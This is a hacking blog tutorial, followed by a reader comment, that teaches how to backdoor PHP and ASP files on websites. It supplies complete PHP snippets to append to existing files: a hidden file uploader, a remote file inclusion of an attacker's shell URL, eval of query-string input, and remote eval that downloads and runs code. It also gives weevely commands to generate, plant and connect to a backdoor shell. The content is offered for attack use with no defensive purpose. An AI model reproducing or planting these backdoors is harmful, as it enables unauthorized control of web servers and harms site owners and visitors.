Tutorial By Sniper haxXx
Sponsored by
Voice of the IT
Today We will Learn on How to infect files like , php , asp etc
I will teach you " infecting an invisible file uploader , infecting RFI , Infecting remote eval, Infecting Eval , Infecting Backdoor shell (weevely).
We will use the malicious codes to infect the files And All those Codes Are Below
Hidden Uploader Code : " <?php if($_GET['upload'] != ""){ if(!isset($_POST['upload'])){ echo '<form enctype="multipart/form-data" method="POST" action=""><br><b>File:</b><input type="file" name="file"> <input type="submit" value="Upload" name="upload"></form>'; } else{ $temporaney = $_FILES['file']['tmp_name']; $upload = $_FILES['file']['name']; if(move_uploaded_file($temporaney,$upload)) echo '<font color="green">File uppato!</font>'; else echo '<font color="red">File non uppato!</font>'; }}?>
This is a hidden uploader malicious code ! Why i say it hidden is that it dont show the uploader till we dont command it .....like if you want to infect any file with that uploader then open that file and paste that code at the end of the file source code
After that open the file which u have infected and then command it by writing " ?upload=pakistan " and ull get the hidden uploader :)
example
www.timesofhacking.com/index.php
then you will write www.timesofhacking.com/index.php?upload=ok
RFI Code : " <?php if($_GET['rfi'] != "") include($_GET['rfi']); ?> "
The same thing i dont want to repeat Copy the code and paste it in the end of the file source code of any php file
then after that open the file
and write " ?rfi=http://www.your_remote_shell_link.com/shell.php "
Eval Code : " <?php if($_GET['eval'] != "") eval($_GET['eval']); ?> "
The Same thing copy paste the malicious code and paste it at the end of the file which you want to infect and after that open file and command it as " ?eval=your_eval_code_here " after the file
Remote Eval Code : " <?php if($_GET['remoteeval'] != "") eval(file_get_contents($_GET['remoteeval'])); ?> "
This is for remote eval so after writing this code at the end of the file
write " ?remoteeval=[LINK CODE] "
Weevely Backdoor : ( we wll generate fresh one with weevely )
Let me Tell Them That Weevely is a Pentest Tool in Backtrack and in kali which is mostly used for backdoor shell acess
And to Generate Open Weevely and Type " weevely.py generate backdoor_shell yourpassword "
The Micro Php shell will be generated in the current location of weevely where you have weevely installed.
Then Open the Weeveely Shell WHich was generated in the current dir of weevely " Weevely.php and copy its source code and do the same thing and past its source code in any file which you want to infect but at the end after that we will connect it from weevely now open weevely and type " weevely.py http://www.your_Infected_file_path.com/Infected_file.php yourpassword
Now t will connect it :) enjoy
Enjoy!
For More Tutorials Follow Me
@YouTube www.youtube.com/sniperhaxx
@facebook www.facebook.com/sniperhaxor
@blog sniperhaxx.blogspot.com
THIS ONE WAS A REALLY GREAT TUTORIAL. :D LIKED IT VERY MUCH.
ReplyDeleteALSO CHECK OUT MY BLOG for all kinds of hacking and cyber security tutorials http://bornhackerz.blogspot.in